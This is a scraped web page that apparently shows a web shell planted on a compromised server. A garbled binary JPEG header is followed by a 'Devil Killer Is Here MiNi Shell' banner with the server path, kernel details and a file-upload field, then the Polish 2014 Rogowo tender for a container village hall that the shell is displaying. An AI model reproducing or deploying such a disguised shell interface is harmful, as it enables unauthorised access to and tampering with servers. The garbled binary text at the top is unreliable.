JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140709/148531-N-2014.html

<p class="kh_header"><b>Rogowo: Budowa kontenerowej świetlicy wiejskiej wraz z jej wyposażeniem w miejscowości Grochowiska Szlacheckie</b><br>
<b>Numer ogłoszenia: 148531 - 2014; data zamieszczenia: 09.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rogowo , ul. Kościelna 8, 88-420 Rogowo, woj. kujawsko-pomorskie, tel. 52 3024053, faks 52 3024275.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://rogowo.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kontenerowej świetlicy wiejskiej wraz z jej wyposażeniem w miejscowości Grochowiska Szlacheckie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Na przedmiot zamówienia składa się wykonanie robót budowlanych polegających na budowie świetlicy wiejskiej w miejscowości Grochowiska Szlacheckie w systemie kontenerowym. Projektowaną  kontenerową świetlicę o wymiarach zewnętrznych 12,06x6,30m należy zakupić jako fabrycznie nową (rok produkcji 2014) i usytuować równolegle do drogi powiatowej na działce nr 15/57 w odległości 18,00m od krawędzi nawierzchni jezdnej utwardzonej. Kontener należy ustawić na wykonanym fundamencie betonowy  B20.  
Kontenerowa świetlica stanowi budynek jednokondygnacyjny, niepodpiwniczony i bez poddasza użytkowego z dachem o konstrukcji dwuspadowej (symetrycznej) pokrytym blacho dachówką. Konstrukcja budynku - kontenera stanowi sztywna rama przestrzenna wykonana 
z kształtowników stalowych spawanych. Konstrukcja zabezpieczona poprzez malowanie farbami ognioochronnymi.
Wskaźniki techniczne:
- powierzchnia zabudowy 76,10m2,
- powierzchnia użytkowa 71,29m2,
- kubatura 312,00m3.
W budynku przewidziano:
- pomieszczenie świetlicy 57,88m2,
- aneks kuchenny 6,65m3,
- toaletę dla mężczyzn 3,29m2,
- toaletę dla kobiet dostosowaną do potrzeb osób niepełnosprawnych 3,47m2.
Szczegółowe wymagania w zakresie  kontenerowej świetlicy
1)Konstrukcja kontenera:
a)ścian zewnętrznych obłożona płytami warstwowymi z rdzeniem z pianki PIR grubości 100mm;  
b)ścian wewnętrznych obłożona płytami warstwowymi z rdzeniem ze styropianu grubości 75mm; 
c)stropu wykonana z płyt warstwowych z rdzeniem z pianki PIR grub. 100mm; 
d)dachowa stalowa, dwuspadowa spawana pokryta blacho dachówką z uwzględnieniem wykonania izolacji z folii para przepuszczalnej;
e)podłoga:
- ocieplenie ze styropianu FS-20 grubości 15cm,
- izolacja przeciwwilgociowa  z folii budowlanej,
- posadzka betonowa z betonu B20 grubości 8cm,
- płytki podłogowe trudnościeralne, antypoślizgowe,
f) stolarka (wg projektu budowlanego zestawienie stolarki):
- okna z PCV 10 sztuk w tym; o wym. w świetle 1470x1440mm - 6 sztuk, okna  870x1440mm - 2 sztuki, okna o wym. 870x540mm - 2 sztuki;
- drzwi łącznie 4 sztuki w tym drzwi zewnętrzne metalowe o wym. w świetle 1000x2050mm- 1 sztuka, drzwi wewnętrzne o wym. 900x2050mm -3 sztuki,
g) obróbki blacharskie:
- opierzenia z blachy ocynkowanej, powlekanej gr. 0,6mm,
- rynny O150 i rury O120 z PCV,
h) instalacja wentylacyjna:
- anemostaty ścienne nawiewne i wywiewne,
- wentylatory ścienne w toaletach,
i) instalacja elektryczna:
- przewody rozprowadzone w listwach elektrycznych naściennych,
- oświetlenie lampy jarzeniowe (zgodnie projektem budowlanym instalacja elektryczna z nr rys E - 1) - 14 szt., 
- oświetlenie żarowe w toaletach (zgodnie projektem budowlanym instalacja elektryczna z nr rys E - 1) - 3 szt.,
- gniazda wtyczkowe podwójne (zgodnie projektem budowlanym instalacja elektryczna z nr rys E - 2) - 22 szt.,
- gniazda wtyczkowe IP44 (zgodnie projektem budowlanym instalacja elektryczna z nr rys E - 2) - 6 szt.,
- rozdzielnia główna (wyłącznik różnicowo prądowy wtyczkowe (zgodnie projektem budowlanym instalacja elektryczna z nr rys E - 4) 1 szt, zabezpieczenia   obwodów: oświetlenia, ogrzewania, gniazd wtyczkowych, podgrzewaczy wody, kuchenki elektrycznej, lodówki,
j) instalacja grzewcza:
- grzejniki elektryczne konwektorowe zamontowane na ścianie - 9 szt.,
k) instalacja wodno-kanalizacyjna:
-przewody do wody i kanalizacyjne rozprowadzone po ścianach wewnętrznych,
- armatura  w tym  zlewozmywak z baterią stojącą z wlewką  wydłużoną - 1kpl., umywalki z bateriami stojącymi - 2 kpl., sedesy wraz ze spłuczką - 2 kpl.,pisuar - 1 kpl. (rozmieszczenie zgodnie z projektem budowlanym -rzut przyziemia),
- podgrzewacz wody o poj. 50l, (montaż w toalecie dla kobiet) - 1 szt.,
- toaleta dla osób niepełnosprawnych wyposażona w pochwyty i poręcze,
l) wyposażenie kuchni (meble):
- szafka pod zlewozmywak 80 - 1 szt.,
- szafka stojąca 80 - 2 szt.,
- szafka stojąca z szufladami 45 - 1 szt.,
- szafka wisząca 80 - 3 szt.,
- szafka wisząca 45 - 1 szt,
- szafka wisząca nad okap kuchenny 60 - 1 szt.,
m)dodatkowo:
- gaśnica 2kg - 1 szt.,
- wieszaki ubraniowe stojące o konstrukcji chromowej z 4 (czterema) zawieszeniami - 2 szt.,
- lustro łazienkowe  o wym. 40x60cm w oprawie chromowanej (wraz z montażem) - 2 szt.,
- pojemnik na papierowe ręczniki (wraz z montażem) w toaletach - 2 szt.,
- uchwyt chromowany na papier toaletowy wraz z ich montażem - 2 szt.,
- mydelniczki chromowana - 2 szt.,
- szczotka do czyszczenia chromowana - 2 szt., 
n)daszek nad wejściem konstrukcja stalowa pokryty blacho dachówką.
Kolorystyka kontenera zgodna z projektem budowlanym.
Wykonawca winien w kosztach uwzględnić zakup materiału, jego transport jak 
i również montaż elementów kontenera w miejscu jego budowania.
2)Szczegółowe wymagania związane z realizacją przedmiotu zamówienia:
a)roboty ziemne:
- usunięcie mechaniczne warstwy ziemi urodzajnej (humus) o grubości 15 cm - 124,90m2,
- wykopy oraz przekopy wykonywane koparkami na odkład w gruncie kat. III - 12,96m3,
- ręczne wykopy ze złożeniem urobku na odkład grunt kat. III - 1,44m3,
- pomiary przy wykopach fundamentowych - 33,135m3,
b) roboty fundamentowe:
- podkład betonowy z betonu B10 gr. 10 cm - 1,44m3,
- ławy fundamentowe betonowe, prostokątne z betonu B20 - 11,88m3,
- izolacja przeciwwilgociowa, pionowa ław fundamentowych dwukrotna -       79,20m2,
c) posadzka:
- podkład z zagęszczonego piasku grubości 20cm - 21,96m3,
- podkład betonowy z betonu B10 grubości 10cm - 7,32m3,
- folia budowlana - 73,20m3,
d) przyłącze wodociągowe:
- wykonanie ręczne wykopów liniowych w gruncie kat. III-IV wraz z ich umocnieniem - 28,35m3,
- ułożenie rurociągu z rur polietylenowych PE O 25/2,3mm wraz z drutem miedzianym DY6 ( na przewodzie wod.) w wykopie - 19,00m,
- kształtki (kolana, złączki) PE O 25mm z gwintem - 4 szt.,
- zawór przelotowy kulowe mufowe o  O 25mm - 1 szt.,
- zawór spustowy o O 15mm - 1 szt.,
- włączenie przyłącza do sieci wodociągowej - 1 szt.,
-zasypanie ręczne wykopu grunt kat. III-IV warz z jego zagęszczeniem - 28,35m3,
- zasuwa wodociągowa O 20mm z obudową i skrzynką uliczną (obłożoną bloczkami z betonu - 1kpl.,
- oznakowanie trasy wodociągu ułożonego w ziemi taśmą sygnalizacyjną z PE - 19,00m,
- oznakowanie zasuwy tabliczką na słupku stalowym - 1kpl.,
- próba szczelności przyłącza wodociągowego z rur PE - 1kpl., 
- dezynfekcja rurociągu przyłącza wody - 1kpl.,
- płukanie rurociągu przyłącza wodociągowego - 1kpl.,
 - montaż wodomierza skrzydełkowego o O15mm - 1kpl.
e) przyłącze kanalizacyjne:
- wykopy liniowe ręczne pod rurociąg w gruncie kat. III-IV - 18,90m3,
- ułożenie rurociągu kanalizacyjnego z PCV O 160x4,7mm - 14,00m,
- włączenie rurociągu z PCV do istniejącej studni rewizyjnej - 1 szt.,
- tuleja szczelna z PCV dla przewodu O 160mm w ścianie studni - 1 szt.,
- studzienka kanalizacyjna VAWIN  O 425mm (zamknięcie rurą teleskopową i włazem żeliwnym C-250) - 1 szt.,
- próba szczelności rurociągu - 14,00m,
- zasypanie ręczne wykopów grunt kat. III-IV wraz z jego zagęszczeniem - 18,90m3,
- oznakowanie trasy rurociągu taśmą sygnalizacyjną z PE - 14,00m,
f) przyłącze energetyczne:
- ręczne kopanie rowów dla kabli w gruncie kat. III - 45,00m,
- ręczne układanie kabli wielożyłowych - 45,00m,
- ręczne zasypanie rowów dla kabli - 45,00m,
g) zagospodarowanie terenu:
- transport ziemi na odległość 3 km na zasypanie istniejących fundamentów i obsypanie  ław fundamentowych wykonanych z przeznaczeniem na kontenerową świetlicę z uwzględnieniem uprzednio zmagazynowanej ziemi w ilości 33,135m3  ziemia winna być zagęszczona - 167,00m3,
- zasypywanie wykopów mechaniczne z przemieszczeniem gruntu na odległość 10m w gruncie kat. I-III - 200,00m3,
- zagęszczenie nasypów ubijakami mechanicznymi grunty spoiste kat. III-IV - 250,00m3,
 - wykonanie schodów betonowych (o wymiarach: 215x140cm + stopnie zgodnie z projektem budowlanym - rzutem przyziemia i przekrojem) na podsypce z piasku zagęszczonego 20cm z piasku i podkładzie betonowym gr. 10cm wraz z obłożeniem płytkami klinkierowymi,
- wykonanie podjazdu betonowego (wym. 372x140cm zgodnie z projektem budowlanym- rzutem przyziemia) o spadku 8% o nawierzchni z  kostki betonowej (szarej) grubości 8 cm na podsypce cementowo- piaskowej oraz na podsypce piaskowej grubości 20 cm po zagęszczeniu i wylaniu podkładu betonowego gr. 10cm z wykonaniem obustronnych balustrad na słupkach oraz uwzględnieniem wykończenia części nadziemnej podjazdu,
- wykonanie opaski wokół budynku z kostki betonowej grubości 8cm na podsypce cementowo - piaskowej o szerokości 50cm ze spadkiem od budynku 2%,
- wykonanie nawierzchni z kostki betonowej (szarej) grubości 8cm na podsypce cementowo - piaskowej - 30,00m2 ,
- obrzeża betonowe o wym. 20x6cm na podsypce piaskowej z wypełnieniem spoin piaskiem - 45,00m,
- rowki pod krawężniki i ławy krawężnikowe o wym. 20x20cm - 120,00m,
- cokoły betonowe z betonu B10 0,2x0,3m 0,2x0,8m - 120,00m,
- ogrodzenie z siatki o wysokości 1,0m na słupkach z kątownika 75x75x8mm o rozstawie 2,40m obsadzonych w cokole - 120,00m,
- wrota i furtka o wysokości 1,0m w ramkach stalowych z pasem dolnym z blachy o wysokości 25cm - 1kpl.,
- sadzenie drzew tuja - 60 szt.,
- podsypka piaskowa z zagęszczeniem mechanicznym grubości 15cm po zagęszczeniu - 450,00m2,
- nawierzchnia z tłucznia kamiennego (kliniec kamienny) warstwa górna grubości 7cm po zagęszczeniu - 450,00m2,
h) wyposażenie świetlicy:
- kuchenka gazowo - elektryczna z 4 palnikami gazowymi i piekarnikiem elektrycznym  o pojemności min. 60 litrów, klasa energetyczna A+,  atestowana butla gazowa, reduktor gazu, przewód gazowy atestowany z końcówkami oraz montaż przez osobę uprawnioną - 1 szt.,
- kuchenka mikrofalowa wolnostojąca o wym. min. 59,5x32,5x 37cm, o poj. min 24,5l  - 1 szt.,
- okap kuchenny ze stali nierdzewnej wyposażony dodatkowo w wentylator elektryczny wywiewny o mocy 240m3/godzinę, wymiary okapu 120x60cm - 1 szt.,
- lodówka z zamrażarką szufladkową  o pojemności chłodziarki min. 230 litrów i zamrażarki min. 50 litrów, wysokości od 180 do 185cm, szerokości 60-65cm, klasa energetyczna A+ - 1 szt.,
- telewizor min. 40 cali  LED z  montażem konstrukcji nośnej na ścianie wraz z montażem anteny dachowej (zewnętrznej) - 1 kpl.,
- stoły składane o wym. min. 200x80cm o grubości blatu 25mm (blaty laminowane,    konstrukcja ze stali) - 10 szt.,
- krzesła o konstrukcji chromowej (siedzisko i oparcie tapicerowane) -  60 szt.,
- zestaw komputerowy w skład, którego wchodzą: stacja dysków(procesor dwurdzeniowy min. 3,3 GHz, pamięć RAM min. 4GB, dysk twardy min. 500 GB, napęd optyczny DVD-RW , klawiatura multimedialna , myszka, monitor 21 cali LCD - 1 kpl. + oprogramowanie WINDOWS 7 Home Premium, Microsoft Office 2013, wraz z instalacją oprogramowania - 1kpl.,
- drukarka laserowa A-4 monochromatyczna o rozdzielczości równej lub większej 600x600dpi, pamięć 2MB, interfejs USB 2.0 ??- 1 szt.,
- stolik komputerowy z blatem laminowanym o wymiarach 120x60cm, nogi ze stali chromowanej oraz półką jezdną dla klawiatury - 1 szt.,
- krzesło komputerowe z oparciem wysokim i podłokietnikami z regulowanym siedziskiem o zmiennej wysokości, krzesło wyposażone w nóżki na kółkach - 1 szt.,
- talerze obiadowe śr. 26 cm głębokie - 50 szt.,
- talerze płytkie obiadowe o śr. 28cm - 50 szt.,
- talerze  płytkie deserowe o śr. 22cm - 50 szt.,
- talerze do ciasta z pokrywą o śr. 29cm - 6 szt.,
- widelce obiadowe nierdzewne - 60 szt.,
- noże obiadowe nierdzewne - 60 szt.,
- łyżki obiadowe nierdzewne - 60 szt.,
- łyżeczki deserowe nierdzewne  - 60 szt.,
- szczypce uniwersalne nierdzewne 400mm - 2 szt.,
- szklanki z duraleksu z uchwytem - 60 szt.,
- literatki o poj. 190 ml - 60 szt.,
- kieliszki małe - 60 szt.,
- kieliszki szampanówki - 60 szt.,
- czajnik elektryczny o poj. min.1,7l -  2 szt., 
- dzbanek do soków szklany o poj. 1,8l -  6 szt.,
- cukiernice o poj. 200ml - 6 szt.,
- taca nierdzewna o wym. 48 x 37cm  -  6 szt.,
- garnek nierdzewny z pokrywą z rączką o poj. 10l -   2szt.,
- garnek nierdzewny z pokrywą z rączką o poj. 2l - 2szt.,
- bulionówka ze spodkiem o poj. 400ml - 60szt.,
- brytfanna żeliwna z pokrywą o poj. 10l - 2szt.,  
- kosz na śmieci o poj. 12l  - 3szt.,
- suszarka do naczyń ze stali nierdzewnej - 1szt.,
- półmisek średni 36 x 20cm - 6 szt.,
- półmisek mały 26 x 18cm - 6 szt.,
- półmisek duży 35x26x6cm - 6 szt.,
- miska nierdzewna śr. 28cm wys. 9cm  - 6 szt.,
- patera nierdzewna do ciasta śr. talerzy - 6 szt.,
- sosjerka nierdzewna o poj. 0,15ml  - 6 szt.,
 5) Zamawiający zaleca dokonanie wizji w terenie przed przystąpieniem do    przygotowania oferty; 
6)Wymagania dotyczące robót:
a)wszystkie prace winny być zrealizowane zgodnie z przepisami, obowiązującymi normami, warunkami technicznymi i sztuką budowlaną, przepisami bhp, p.poż., ochrony zdrowia i środowiska oraz zgodnie z poleceniami inspektora nadzoru;
b)roboty należy prowadzić zgodnie z wymaganiami projektów budowlanych (konstrukcyjno - budowlanego, wewnętrznej i zewnętrznej instalacji sanitarnej oraz instalacji elektrycznej) określających przedmiot zamówienia, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz wymogami niniejszej SIWZ;
c)wszystkie materiały użyte do wykonania zamówienia winny spełniać wymogi art. 10 ustawy Prawo budowlane oraz wymogi ustawy z dnia 16 kwietnia 2004r. o wyrobach budowlanych (Dz. U. Nr 92, poz. 881 z późn. zm.) oraz odpowiadać warunkom opisanym w przedmiarach robót;
d)Wykonawca realizuje zadanie zgodnie z przedmiarem robót, obowiązującymi warunkami technicznymi, normami państwowymi i branżowymi, przepisami prawa budowlanego oraz zaleceniami inspektora nadzoru lub Zamawiającego w porozumieniu z inspektorem nadzoru.
7)Do obowiązków Wykonawcy należeć będzie również:
a)do formularza ofertowego załączyć kosztorys ofertowy sporządzony metodą szczegółową;
b)wykonanie prac towarzyszących (geodezyjne wytyczenie i inwentaryzację powykonawczą w 3 egz.);
c)oznakowanie miejsca wykonywania robót zgodnie z obowiązującymi przepisami;
d)odpowiedzialność za całokształt, w tym za przebieg oraz terminowe wykonanie zamówienia, za jakość, zgodność z warunkami technicznymi jakościowymi określonymi dla przedmiotu zamówienia;
e)sporządzenie planu bezpieczeństwa pracy i ochrony zdrowia (BIOZ) przez kierownika budowy (robót); 
f)wymagana jest należyta staranność przy realizacji zamówienia, rozumiana jako staranność profesjonalisty w działalności objętej przedmiotem niniejszego zamówienia;
g)organizacja placu budowy oraz jego zabezpieczenie przed dostępem osób trzecich;
h) w przypadku uszkodzenia jakiejkolwiek infrastruktury technicznej podziemnej          (kabli telekomunikacyjnych, kabli energetycznych, sieci wodociągowej wraz z przyłączami, sieci kanalizacyjnej wraz z przyłączami) Wykonawca będzie zobowiązany we własnym zakresie i na własny koszt niezwłocznie je usunąć po uprzednim zawiadomieniu inwestora, gestora urządzeń;
i)pokrycie kosztów zużycia energii elektrycznej i wody;
j)wykonanie niezbędnych sprawdzeń, badań i pomiarów; 
k)po zakończeniu robót, ale przed ostatecznym odbiorem przez Zamawiającego Wykonawca zobowiązany jest do uporządkowania terenu budowy wraz z terenem przyległym;
l)po wykonaniu przez Wykonawcę robót przewidzianych niniejszą SIWZ Zamawiający dokona ich odbioru. Celem odbioru jest sprawdzenie należytego wykonania tych robót tzn. zgodnie z dokumentacją techniczną, Specyfikacją techniczną wykonania i odbioru robót budowlanych, przy uwzględnieniu wszystkich pozycji wynikających z przedmiaru robót;
m)przed przystąpieniem do końcowego odbioru robót Wykonawca przedstawia Zamawiającemu protokóły z zagęszczania gruntu, wykonanych pozytywnych prób ciśnieniowych i badań jakie były niezbędne do prawidłowej realizacji zamówienia w tym badanie wody, certyfikaty lub atesty na zastosowany materiał, karty gwarancyjne na każde urządzenie elektryczne wchodzące w skład wyposażenia, DTR urządzeń, instrukcje obsługi w języku polskim, dokumentację powykonawczą  kosztorysy szczegółowe powykonawcze - zgodnie z załączonymi przedmiarami robót, książkę obmiaru robót oraz dziennik budowy;
n)spełnienie innych wymagań określonych we wzorze umowy oraz wynikających         z obowiązujących przepisów prawa.
8)Możliwość zatrudnienia podwykonawców:
a)Zamawiający dopuszcza możliwość powierzenia przez Wykonawcę wykonanie  części zamówienia podwykonawcom; w takim przypadku Wykonawca jest zobowiązany do wskazania w swojej ofercie części zamówienia (zakresu), której wykonanie zamierza powierzyć podwykonawcom oraz dalszym podwykonawcom;
b)Zamawiający może zgodnie z art. 6471 k.c. wnieść sprzeciw lub zastrzeżenia    
do umowy zawartej pomiędzy Wykonawcą a podwykonawcą.
9)Zamawiający wymaga, że:
a)Wykonawca udzieli min. 36 miesięcznej gwarancji liczonej od dnia odebrania przez Zamawiającego robót budowlano - montażowych i podpisania (bez uwag) protokółu końcowego;
b)na odbiór końcowy  przedmiotu zamówienia Wykonawca przedłoży:
- protokóły odbiorów technicznych,
- protokoły z wymaganych; badań, prób,
- atesty, certyfikaty, deklaracje zgodności i aprobaty techniczne na wbudowane materiały,
- karty gwarancyjne na każde urządzenie elektryczne wchodzące w skład wyposażenia, DTR urządzeń, 
- instrukcje obsługi w języku polskim,  
- książkę obmiarów,
- dziennik budowy,
- inwentaryzację powykonawczą w 3 egz.,
- kosztorys powykonawczy sporządzony metodą szczegółową. 
10)Zamawiający nie zapewnia zaplecza socjalno - technicznego oraz innych mediów potrzebnych do realizacji zamówienia i nie ponosi odpowiedzialności za mienie zgromadzone na placu budowy.  
11)Zamawiający posiada pozwolenie na budowę.

Do każdej nazwy firmy, przykładowych znaków towarowych, typów urządzeń, które zostały wymienione w specyfikacji technicznej wykonania i odbioru robót, przedmiarze robót dodaje się lub równoważne. Za równoważne rozumie się materiały lub urządzenia o parametrach nie gorszych niż wyszczególnione w SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.50.00-7, 45.22.38.00-4, 45.23.32.00-1, 32.00.00.00-3, 39.22.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja tego warunku nastąpi poprzez odesłanie do odrębnych przepisów, które   wskazują na obowiązek posiadania uprawnień do wykonywania określonej działalności lub czynności. Wykazaniu spełnienia tego warunku może posłużyć odpowiedni dokument koncesji, zezwolenia lub licencji Wykonawcy (ubiegającego się  o zamówienie publiczne - przyszła strona umowy).
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie    spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do weryfikacji spełnienia tego warunku posłużą odpowiednio wykazy wykonanych robót budowlanych. Warunek ten będzie spełniony, jeżeli Wykonawcy udokumentują, że wykonali tj. zakończyli roboty budowlane w okresie pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, z podaniem ich rodzaju 
i wartości, daty i miejsca wykonywania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie  z zasadami sztuki budowlanej i prawidłowo ukończone. Wykonawca powinien udokumentować co najmniej jedną robotę budowlaną odpowiadającą rodzajowo przedmiotowi zamówienia tj. budowie, przebudowie 
o podobnym przeznaczeniu obiektów użyteczności publicznej o podobnych parametrach o wartości całego zadania minimum 250 000,00zł brutto.
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy (Załącznik nr 2 do SIWZ) potwierdzającego spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że  będzie posiadał co najmniej:
a)1 samochód wywrotka do 5,0t,
b)1 samochód wywrotka 10-15t,
c)1 koparko - spycharka na podwoziu ciąg. 0,15 m3,
d)1 spycharka gąsienicowa 75KM,
e)1 żuraw samochodowy 4 t,
f)1 walec statyczny samojezdny 4-6 Mg,
g)1 walec statyczny samojezdny 15 Mg,
h)1 ubijak spalinowy 200 kg,
i)1 wibrator powierzchniowy,
j)1 piła do cięcia kostki
z informacją o podstawie ich dysponowania.
